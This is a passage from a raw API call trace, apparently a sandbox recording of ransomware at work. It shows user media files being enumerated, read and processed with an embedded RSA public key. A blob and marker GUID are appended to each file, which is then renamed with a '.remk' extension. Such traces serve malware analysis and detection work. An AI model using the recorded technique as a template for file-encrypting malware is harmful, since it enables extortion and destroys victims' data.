| out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee808 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee850 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7f0 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7c0 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7a8 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc398 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.433] WriteFile (in: hFile=0x640, lpBuffer=0x37bc408*, nNumberOfBytesToWrite=0xc27, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37bc408*, lpNumberOfBytesWritten=0x3adfb14*=0xc27, lpOverlapped=0x0) returned 1 [0234.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.433] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.433] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.434] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.434] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.434] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.434] CloseHandle (hObject=0x640) returned 1 [0234.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0234.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0234.435] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\j8VGyPK3jrNNvLRuL67g.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\j8vgypk3jrnnvlrul67g.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\j8VGyPK3jrNNvLRuL67g.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\j8vgypk3jrnnvlrul67g.wav.remk")) returned 1 [0234.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.436] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0234.438] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe372c120, ftCreationTime.dwHighDateTime=0x1d5dfde, ftLastAccessTime.dwLowDateTime=0xbb07a7b0, ftLastAccessTime.dwHighDateTime=0x1d5e280, ftLastWriteTime.dwLowDateTime=0xbb07a7b0, ftLastWriteTime.dwHighDateTime=0x1d5e280, nFileSizeHigh=0x0, nFileSizeLow=0x13fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JJIlS8u_6kS2VPu.m4a", cAlternateFileName="JJILS8~1.M4A")) returned 1 [0234.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.438] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\JJIlS8u_6kS2VPu.m4a") returned=".m4a" [0234.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\JJIlS8u_6kS2VPu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\jjils8u_6ks2vpu.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.440] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=5114) returned 1 [0234.440] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.443] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.443] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.445] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.445] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x13fa, lpOverlapped=0x0) returned 1 [0234.446] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.446] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.446] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.446] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.447] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.447] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.447] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.447] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.447] GetLastError () returned 0x0 [0234.447] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.447] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.447] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.448] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.448] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1400) returned 0x37bc408 [0234.448] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bc398 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7a8 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c3c8 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7c0 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7f0 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee850 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee808 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.449] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37bd810 [0234.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7f0 | out: hHeap=0x630000) returned 1 [0234.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee808 | out: hHeap=0x630000) returned 1 [0234.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee850 | out: hHeap=0x630000) returned 1 [0234.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd810 | out: hHeap=0x630000) returned 1 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee850 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee808 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee7f0 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.450] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.450] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.450] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.450] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.450] CloseHandle (hObject=0x640) returned 1 [0234.455] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\JJIlS8u_6kS2VPu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\jjils8u_6ks2vpu.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\JJIlS8u_6kS2VPu.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\jjils8u_6ks2vpu.m4a.remk")) returned 1 [0234.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b0 | out: hHeap=0x630000) returned 1 [0234.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.456] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0234.457] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe372c120, ftCreationTime.dwHighDateTime=0x1d5dfde, ftLastAccessTime.dwLowDateTime=0xbb07a7b0, ftLastAccessTime.dwHighDateTime=0x1d5e280, ftLastWriteTime.dwLowDateTime=0xbb07a7b0, ftLastWriteTime.dwHighDateTime=0x1d5e280, nFileSizeHigh=0x0, nFileSizeLow=0x13fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JJIlS8u_6kS2VPu.m4a", cAlternateFileName="JJILS8~1.M4A")) returned 0 [0234.457] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0234.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0234.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0234.458] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0234.458] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0234.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\") returned="_dqq7i08G7zkmy4eWB\\" [0234.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0234.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0234.458] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0234.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.458] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0234.458] PathFindFileNameW (pszPath="") returned="" [0234.458] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66b38ff0, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0xc0ae7fa0, ftLastAccessTime.dwHighDateTime=0x1d5e5f4, ftLastWriteTime.dwLowDateTime=0xc0ae7fa0, ftLastWriteTime.dwHighDateTime=0x1d5e5f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0234.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.459] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66b38ff0, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0xc0ae7fa0, ftLastAccessTime.dwHighDateTime=0x1d5e5f4, ftLastWriteTime.dwLowDateTime=0xc0ae7fa0, ftLastWriteTime.dwHighDateTime=0x1d5e5f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.459] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0427a70, ftCreationTime.dwHighDateTime=0x1d5e07b, ftLastAccessTime.dwLowDateTime=0xbb0c1d90, ftLastAccessTime.dwHighDateTime=0x1d5dee8, ftLastWriteTime.dwLowDateTime=0xbb0c1d90, ftLastWriteTime.dwHighDateTime=0x1d5dee8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4HUb e9qKHwuKHz-", cAlternateFileName="4HUBE9~1")) returned 1 [0234.460] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6cbf210, ftCreationTime.dwHighDateTime=0x1d5db34, ftLastAccessTime.dwLowDateTime=0x97c6ca80, ftLastAccessTime.dwHighDateTime=0x1d5de82, ftLastWriteTime.dwLowDateTime=0x97c6ca80, ftLastWriteTime.dwHighDateTime=0x1d5de82, nFileSizeHigh=0x0, nFileSizeLow=0xd943, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="55dO.jpg", cAlternateFileName="")) returned 1 [0234.460] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\55dO.jpg") returned=".jpg" [0234.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\55dO.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\55do.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.461] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=55619) returned 1 [0234.461] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.464] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xd91d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.464] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.466] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xd943, lpOverlapped=0x0) returned 1 [0234.467] lstrlenA (lpString="-----BEGIN PUBLIC 